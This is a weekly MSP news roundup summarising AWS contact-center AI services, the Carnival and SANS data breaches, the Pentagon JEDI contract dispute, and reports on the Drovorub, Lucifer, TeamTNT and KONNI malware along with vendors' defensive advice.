What's new this week in the news for MSPs?
New AI tools coming from AWS; Carnival has customer data stolen in a ransomware attack; Russian malware Drovorub aimed at federal Linux-based defense systems; Satan DDoS now scans and infects Linux systems; TeamTNT’s crypto-mining worm steals AWS credentials from Docker systems, and cybercriminals arming phishing emails with macro codes that launch KONNI to grab data and more.
Let's see what it's all about.
New AI Tools Coming From AWS
A suite of Contact Center Intelligence services was launched by Amazon Web Services, where clients can add more information to their contact center operations. Its capabilities include text-to-speech, enterprise search, language comprehension, translation, business intelligence, and chatbots that will help companies bring machine learning into their services.
AWS developer advocate Alejandra Quetzalli explains in a blog post that AWS CCI services are being offered through partners like Vonage Holdings Corp., Genesys Telecommunications Laboratories, Inc., and UiPath, Inc., and integrate with already-existing enterprise contact center systems.
According to Quetzalli, the new Amazon CCI is available in regions where the underlying Amazon services are available at present.
Carnival Has Customer Data Stolen in a Ransomware Attack
Carnival Corp. & plc, one of the world’s largest cruise operators, was hit by a ransomware attack in which customer data was taken. On August 15th, the company submitted a filing with the US Securities and Exchange Commission, revealing that the attack was noted on the day it occurred. They haven’t mentioned which form of ransomware was involved in the attack but shared that only a portion of one of their brand’s systems was accessed and encrypted, and specific data files downloaded.
The stolen data included personal information of employees and guests, “which may result in potential claims from guests, employees, shareholders, or regulatory agencies,” according to the company.
Besides launching an investigation, Carnival has engaged legal representation and informed law enforcement and other incident response professionals.
Pentagon Asks for More Time on the Jedi Contract
The US Department of Defense has been reviewing the award of a contract to Microsoft Corp. It has requested a thirty-day extension before it gives its final decision.
The Joint Enterprise Defense Infrastructure (JEDI) project entails an infrastructure for cloud computing for the Pentagon. This project will create a link between many military systems and put them under an individual, unified architecture. According to the Department of Defense (DOD), artificial intelligence projects under JEDI will move ahead to the next level.
The award of JEDI to Microsoft Corp. ahead of a bid by Amazon Web Services, Inc. that experts say was the favorite, has been a matter of controversy.
Amazon and Microsoft have been at loggerheads since the award. Last May, Drew Herdener, VP for AWS, commented that the award decision was "fatally flawed on all six of the technical evaluation factors." Frank Shaw, Microsoft's corporate VP of communications, responded, claiming Amazon was "trying to bog down JEDI in complaints, litigation and other delays" to overcome its failed bid.
Sans Institute Data Breach
The SANS Institute, a cybersecurity training, and certification firm confirmed in a statement this week that it had suffered a data breach. According to the announcement, the hackers took the records of approximately 28,000 clients. The breach began from a phishing attack on an employee which contained an infected Office 365 attachment.
In its statement, SANS revealed that it had detected the breach on August 6th. It then "quickly stopped any further release of information" from the compromised account. The email account was forwarding the data to a suspicious external email address.
The company suggested that there was no evidence that it was a targeted attack.
Tim Wade at Vectra AI, Inc., a threat detection and response firm, said in a comment to SiliconANGLE, "The real hallmark of modern security is about resilience to attacks – the capacity to perform timely detection and response before material damage is done even after preventative controls have failed."
Ilia Kolochenko, from ImmuniWeb, also noted, "Attackers will now gradually focus their attention on cybersecurity companies and organizations to get their clients' privileged information or credentials." He also offered praise for the SANS Institute's response to the incident.
Russian Malware Drovorub Aimed at Federal Linux-Based Defense Systems
The National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) in a joint advisory revealed that Russian hackers have aimed malware called Drovorub at federal Linux-based defense systems.
They noted that observations reveal ties to the Russian General Staff Main Intelligence Directorate (GRU), 85th Main Special Service Center (GTsSS), military unit 26165, also referred to as Fancy Bear, Strontium, or APT 28.
The malware consists of four modules. The modules include an implant coupled with a kernel module rootkit, a file transfer, a port forwarding tool, and a command and control (C2) server. It also uses several methods to avoid detection.
Lucifer DDoS Now Scans and Infects Linux Systems
A hybrid DDoS botnet has been observed with new moves. Previously it was known for targeting vulnerable Windows devices and turning them into crypto-mining bots. Now it is also scanning and infecting Linux systems.
The Lucifer malware creators have also expanded the capabilities of the Windows version to steal credentials and escalate privileges by using the Mimikatz post-exploitation tool.
In May, Palo Alto Networks Unit 42 researchers first noticed the malware deploying an XMRig miner on infected Windows computers using weaponized exploits. It was targeting high- and critical-severity vulnerabilities or brute-forcing machines with TCP ports 135 (RPC) and 1433 (MSSQL) open.
In a recent report published by researchers from NETSCOUT's ATLAS Security Engineering & Response Team (ASERT), the Linux port, as uploaded on VirusTotal on July 9th, 2020, carries the same welcome message as the Windows variant.
Lucifer's creators ensure they can expand the total number of devices controlled by their botnet by adding support for other platforms. The new capabilities lead experts to believe that there is more to come from this botnet.
TeamTNT’s Crypto-mining Worm Steals AWS Credentials From Docker Systems
A crypto-mining worm is stealing plain-text AWC credentials and config files from compromised Docker and Kubernetes systems. The group behind these activities is known as TeamTNT.
MalwareHunterTeam first noted the activity in May, and researchers from Trend Micro did further analysis and found its attraction to misconfigured Dockers containers.
According to researchers at Cado Security, this worm is the first ever that combines AWS credential theft functionality with run-of-the-mill crypto-mining modules.
Using already-infected servers to execute an open-source masscan IP port scanner instance that scans for exposed Docker APIs (and Kubernetes systems, as later discovered) allows the botnet to install itself in new containers on any misconfigured servers it finds.
Cado Security recommends the following in order to defend against the TeamTNT worm’s attacks:
- Delete any files storing AWS credentials and config info in plain text.
- Monitor connections made to mining pools using the Stratum mining protocol.
- Block access to Docker APIs using firewall whitelist rules.
Cybercriminals Arm Phishing Emails With Macro Codes That Launch KONNI to Steal Data and More
The Cybersecurity and Infrastructure Security Agency (CISA) of the US Department of Homeland Security has issued an alert about cybercriminals using phishing emails that install KONNI malware on targeted systems.
KONNI is a remote administration tool that hackers frequently use to take screenshots, steal files, capture keystrokes, and execute malicious code on compromised machines. It is commonly delivered through phishing emails with Microsoft Word documents embedded with a Visual Basic Application (VBA) macro that deploys the malware.
It changes a victim’s machine's font color from light grey to black to trick users into enabling content. Additionally, KONNI verifies whether a Windows OS is the 32-bit or 64-bit version and builds and executes the command line to download more files.
Once the VBA macro has made the command line, it uses the certificate database tool CertUtil to download remote files from a given uniform resource locator. It also uses a built-in function to decode base64-encoded files.
CISA provides several recommendations to businesses in order to avoid this kind of attack:
Maintain up-to-date antivirus signatures and engines.
- Keep operating systems up to date.
- Disable file and printer sharing servers.
- Restrict users' ability to install and run unwanted software applications.
Officials also suggest that it is best not to add users to the local admins group.
That's a Wrap for News You Might've Missed
I hope this update has been helpful. MSP360 is your resource for MSP news. Stay home, stay safe and healthy, and remember to check back next week for more highlights.
Read our free guide to learn about:
- Common MSP vulnerabilities;
- How to prepare for a ransomware attack to keep your clients safe;
- Which actions response to a ransomware attack should involve;
- How to manage clients while handling an attack.